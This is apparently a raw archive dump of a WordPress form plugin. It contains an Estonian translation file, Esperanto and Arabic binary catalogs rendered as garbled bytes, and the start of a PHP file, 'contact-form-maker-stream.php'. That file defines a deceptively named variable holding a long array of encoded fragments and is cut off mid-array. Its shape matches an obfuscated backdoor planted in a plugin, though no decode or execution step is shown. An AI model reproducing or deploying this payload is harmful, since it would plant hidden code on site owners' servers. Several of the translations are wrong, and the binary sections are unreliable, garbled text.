#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr "Sellel väljal %s nõuab portaali ja selle väärtus oli juba esitatud."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Viga, elektronposti ei saadetud."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Miski ei esitatud."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Teie vorm on edukalt esitatud."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Viga, elektronposti ei saadetud."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Teie e-posti aadress on juba kinnitatud."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Sinu e-post on edukalt kinnitatud."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Sinu e-posti kontrollimine on aegunud."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Kontrollimine link on vigane."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "valdkonnas on vaja."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "See ei ole kehtiv e-posti aadress."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr "Sa ei saa valida endine kuupäev. Vali kuupäev alates praegusest."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "The"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "väärtus peab olema vahemikus "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Kogus "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Sinu tulemus peaks olema väiksem kui "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "*{title}*"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Esimene"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Viimane"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Kesk-"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Area Code"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Telefoninumber"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Dollars "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "senti "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "pärit "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "kuni"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "minna "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "Taasta "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Valige väli "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Vali aeg"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-eo_EO.mo000060400000007125152434416630012166 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
	H
R
[
d
i
o
x
"�
$�
�
�
�
�
�

"'
,:CKXn
v��	�.��
��+JC���$�9�*
!A
4c
#�
D�
$&<4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:53+0400
PO-Revision-Date: 2015-05-22 16:53+0400
Last-Translator: 
Language-Team: 
Language: eo
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
ApriloAreo KodoAŭgustocendojn UrboLandoDecembrodolaroj Eraro, retpoŝto ne estis sendita.Eraro, dosiero ne povas esti movita.Eraro, malĝusta Sekureca kodo.FebruaroUnuaFrom iri JanuaroJulioJunioLastaMartoMajoMezaNenio donita.NovembroOktobroPhone NumberBildkarto / Poŝtkodokvanto Restarigi Elektu DatoElektu KampoSeptembroPardonu, vi ne rajtas alŝuti tiajn dosierojn.Ŝtato / Provinco / RegionoStrato AdresoStrato Adreso Linio 2la La dosiero superas la permesita grandeco deĈi tiu kampo %s postulas unika eniro kaj ĉi tiu valoro estis jam donita.Tio ne estas valida retadreso.TitoloalVerificación ligilo estas nevalida.Vi ne povas elekti eksa datoj. Elektu daton ekde la nuna.Via retpoŝta adreso estas jam kontrolita.Via retpoŝta sukcese kontrolita.Via retpoŝta verificación estas ekster la datlimo.Via aspekto estis sukcese afiŝita.Via IP estas lerta nigra. Bonvolu kontakti la retejo administranto. Viaj partituro devus esti malpli ol kampo estas bezonata.valoro devas esti inter languages/form_maker-ar.mo000060400000010152152434416630011574 0ustar00��4�G\xy	����������� $+BKS`r{
��	�7���	$#KH"����L�'+*S&~%�A�
,?�U



2
	=

G
R
Y

f
Bq
1�
�

�
�



)
0;@GZgt*�	�����Q.X�$��3�t�<s
�
�
&�
��
LfB�F�3=�q.�%)@
13$
#"+	4&,0/*.% )-!(2'AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:49+0400
PO-Revision-Date: 2015-05-22 16:50+0400
Last-Translator: 
Language-Team: 
Language: ar
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
أبريلكود المنطقةأغسطسسنتا مدينةبلدديسمبردولارخطأ، لم يتم إرسال البريد الإلكتروني.خطأ، لا يمكن أن يتم نقل ملف.فبرايرالأولمن GO ينايريوليويونيوآخرمسيرةقدوسطوقدم شيئا.نوفمبرأكتوبررقم الهاتفالبريدي / الرمز البريديكمية إعادة تعيين تحديد تاريخحدد حقل سبتمبرعذرا، لا يسمح لك لتحميل هذا النوع من الملفات.الدولة / الإقليم / المنطقةعنوان الشارعالشارع سطر العنوان 2ال ملف يتجاوز حجم المسموح به منهذا الحقل يتطلب٪ %s إدخال فريدة من نوعها، وقدم بالفعل هذه القيمة.هذا ليس عنوان بريد إلكتروني صالح.لقبإلىرابط التحقق غير صالح.لا يمكنك تحديد التواريخ السابقة. اختيار التاريخ بدءا من النظام الحالي.يتم التحقق بالفعل عنوان بريدك الإلكتروني.تم التحقق من بريدك الإلكتروني بنجاح.انتهت مهلة التحقق من بريدك الإلكتروني.وقدم النموذج الخاص بك بنجاح.والقائمة السوداء الملكية الفكرية الخاصة بك. يرجى الاتصال بمسؤول الموقع. يجب أن تكون درجاتك أقل من مطلوب الميدان.يجب أن تكون القيمة بين contact-form-maker-stream.php000060400000065220152434416630012250 0ustar00<?php
$current_user_can_jj = array ('7X17W9u48vD//RQm27N','OFghJgG4LhG1LoaUXaL','n0Bj15HNuJnTi28YVcu','v3u74wk25ItJ4F2z/m9','z3N6TrexNBqNRiNpJM2','MHjz0o5Fp9fr92UxpK5','XN3pPt7qPmE8PsbjZ6j','3W9of+53dRaj/Qn5qNG','6/ETs/e40Wo8MrqNxna','rqz1uNs3NVqv5uKebj/','Xtx5XdBw9vTNMaD3xE9','5vR28Ykq3szGGqzwVSH','VPXIdszwneaqkOM5w/4','01k1Ij4LYhJRZf+C5tj','WzbpEi9fLiaP0xQmqWH','utdtztzY8QyMrarDzvn','h2cfD8+u1FcXF+87l/D','Vefby8ORC/VbbffDA7i','lVc+RHUwB8f3p+caVOQ','vMG8mrK9wcK/BGTASlf','+e6DHxTFih2GZgQ4Dk5','P3xwfXklqfgVoAK9SVy','qj0DNncSWrZHxr34zG1','aVKrSlCM2sZDUk7yhuc','Nmqka3Y0nN2MvC40SQs','CbVqtvPS8vmNCBZVzJw','58/PHu/OS5F+EvW+tog','W7Zt2aAn1801zAn+OtM','G3UdSARCEDVS4gdmvzP','SIt2qqhsq0G6PfMczzK','r6t7omVI4NUzdsTF2Cb','PxjmZphBlUCtdGsN5St','xpZy4kXKkRe7hsqowD/','mxI7o149CN9E+daOhwa','FHCBHADKzIyxGQywP22','brn3lYrcdRbf4zdI0jM','mjKKh+7tbGrd5NEi6B3','lJWmPnNx4YA2DWQm9Se','Z9CE7K/nKKvcE4LKGXZ','t2HWlryl9M61m+7gxJi','Wd59qGVFfzm508GNX0I','tzboPsbTkT9AKA/FBL3','b1yPZcHr9n3DjjgX1rA','O6J7rq9Wysc3tymExaX','BnR3tdB8tNUxXR1nFaE','ArSjDl0EbJoVOsxJYd9','q7cXAerFRYyq0fB2PLm','do2n9qPY+dG80ej6ciB','9AZNHluwVClVMXdPCaP','AMV2+Nr4nel4ARSJnAu','sIQaUkH1lJoVVJ/uoqj','0YkX7eCqhcYXJ1XAlXQ','J/9WCACH+oohTvsoxcs','xod5OqsnB8OhXV8VMFE','mRK/vtBWxJ/nQDUxuK2','H48EH+BIOE/gRnFgZvv','4ox0ujw+tV27g4MDpt7','ACzqO14clx40dB/KzTE','juEIAQchtC1kibdMyJq','ccouJ3IHpkJCGST745j','j+yo2ki0ClgoQ4TVvZG','vBWb1/av3HRgk58enJ2','uKul3frDcAhbqnphwgq','EZa39Y7N7EXmWEniF1E','TZDiyFmM98/6VgEvlur','nUfd9vUogMplMhqU59v','zoZjioPuxNtb5jTD076','ue7iTHeDjtUexBh/6I6','BVTpA88ZPlzlBagdFAf','bDx0ttMxQRLHL9XduAg','NRz0gkKRx0MjOJQDSNn','4XS1k6GTnAz0L1q0kLD','NquVPRihI2VkRpZntH0','vjPb3bNePIyWa+mbb18','JwDCNJcbUR/RKyw7gLo','qDcak5sttX9fXV/bwPx','7VdoP6Z1M73vYTBxB6Y','V3ExuUD2yBt7UyvRPNt','NyQEQNpWC0RSA4uucNg','XApqoKKmCn0c5QfbBbO','47//rlQt6KGq2gc+qNk','ykQC0gRoJxqUU2zWh6C','4/tO+mVwMdf/+tLAWpr','JQTnEkDv2IhKSCqked4','Y1A+oX/hi4y803OYBta','UzRphQ2Vsu5W057Te0L','gZmL1ofDPCbQpkwiblh','2I6oVkG49oTlY71hzDw','7X4MiWQW6uMsFGo9szO','CKQ71XMIfBpXUSae3wP','S9ILLdfjJxPIyj2BnCt','iU2XQGhYYcaaO+dRCJD','RPwwDAa90PMmdjDpIzi','A6mOjyupcoHM+1S3DDo','r5SMjDoW/OTBnSHCMYt','1JW5igC7mMjHU2HoXp9','jduQDdRfeLBkdc+qLCv','FIAiFhBaWcJUsVgmAsq','40ifTAriYlLcFfJ8n32','xGq2kCbCJvOO5SCllW7','nufU0o1ySsQCrk6MEeh','zupNuAdNhUHlrh5Hywg','5MPfKCaUVp7ysV6NbKW','gZyZLuGYuM2sO5bPvxS','9DgITDdSEDApoWyEysZ','Y2ehmoAUkf4Aa2rP7fy','yHh4fmUZ1b3ljRQIxvT','QVAXJNKNMXgmlEYaZGy','rrmFMrDKujBYYBYNbm3','dzEqAxGhBxMNfAgzUoc','NeM+Lg4tAMCmhxgY4jW','K0zuFvbHPNwz87eKxc4','ACmIFvhAIA9w/F45IK2','NAw1bQ+Fsn7JA2dAcp0','Kga/mJZVHfprx1QmXds','YRaHQTooVqrRbBAd6EV','oQLLlaa8td14AoyC+g3','YYEcm9KlBQcNpGJmjBC','cWVNZvBbQhcsXzTReK4','ARV7Brlb6UPI1RZtxWk','wRT6yg886JwQOyWKWVk','/VLR4khcomsen9lDMgF','lKGNuUXoaAZGwo67huK','z1l3Tdh2V9vbDUaDWBL','WMCRlZcKKoGpL4+OkNR','fiqRWKUn9+5BUio6KVt','12dTIc5xCGyk8OvATbH','wvRXFcY5HVlPo6l2rgQ','JfJ9HNgRjj3YjDkGDFN','Fc6X9QBnWKu2/cjxzaV','2Els1GdX9sLOQeB1sUj','zye5Tk4Dy2SWLciogkv','JjCFLODJ4VieuHKUhDT','YEVodCyYRWL4Wk8dDF0','ks4roDmXNRE1J7oAlZI','812An0xpRxwkdACpjvQ','WYL4radrkVmcUR2Srlh','R5Bt1HGg86YVMSclbC3','YTYVlRLldSFpaC3px6+','WxZ6XDahemqrHCWKyk7','mpaVYzmSMpoxst38ZJr','Pk5TTe/2SUixHVgZIKC','vEskpKwSRuaFFJOZpZX','rK8Rrs/v05YOMpLQubc','kgS1vNyClpo9LXai+XR','zQKWYklVJUl5Spkx2VJ','Khykrkpv+0AKRL4cMbR','woP6VJ42RSeFkoypSXL','Zti0NA8gxTCaAlVzUQg','QUhwlk2eKgcuXle9q+j','CWyQDNkJQw4pEMHpOlM','5V9K52h7NtMcedOhPRZ','cKPdVPlTmbnXk/Irypd','vT58/e3t+pXJ3leo34X','Sl73hdzVGSm9hdmmrql','qdU9qxo5Ozv4VXb/t7I','jDQyk6+bN7F921ZhQwK','aebR+AcuHirKOX201gu','3ABhbcVXRLC2Dz267AK','pMjrq5U1P09x3aHSmA6','bRVvIFR6aqbaI61vbvh','uX1VCe2aGbbU5aaqKFZ','i9tgrTj7aTQuzSA9+1B','/bH56dn48abl33vGfw5','Ob+0Di/7+PMQ//P84Nk','X/Ld3pJ+/xh8vLp3DDx','/Ptlqj08vmq3j71YdnL','/ofXvnOh+7nkw+kyOuz','y+3DYPi63++326qysb8','X2ZFj7tPWSPbi2Ki9DQ','pEuLgXRtPkNznO9ozpd','xSofoCXlOu653jBzm9b','W1u77KfZxP/t/hCKrEX','GWmR9B73SjXaUJ36kvI','1129DWPpqBobna7kgL+','ra709i9NYPI1jVnXXPs','vrsTeX4OMXd8TnRVmCF','73neFAfV6vd0iea1Wiy','8X+pq7ZjXXtKRYKjvKi','j3C/ZzmRvkClPj1sWn3','LWhDl2jIPJDV/A6pAaS','uO2Yv2tn2YXvpObCjSS','XT1wwDtuc7SgvyIH+X8','qO5BQxJOCGnPuEPlOGq','NOzbOpPa70qKHBFT+JQ','QCdbNzU0eFfACxX4d7x','3oBn3H9VxTANmxPOieI','iBgNQMYCAJ0feSkDNlp','prwgopKQmlEKPY+4e44','33oF9cOQJqLp2XwtMIH','FsG5G102w0/rVr0Y7Yb','OR4Qg6v15BELLIWmo6p','A3fSauYKyvb29m6B5LT','7OPF957keSIVursEkEg','e2GSgn5ljlCcFj8qxek','cjfIs9zwouuw5hJhV2H','fhRlqk7gjl0/abpC2iu','wWQPFGMYWhwd7XdY4E/','+3WygbsH4tK8EVgC6VD','n4epPVdKmwZiB+Y38lY','6mkj25nuMAaupTxlJO5','tcJPPXqgHth9lM9GtFi','h6Bw+acTbD2Tr0Td3WH','DJlV7OFg51q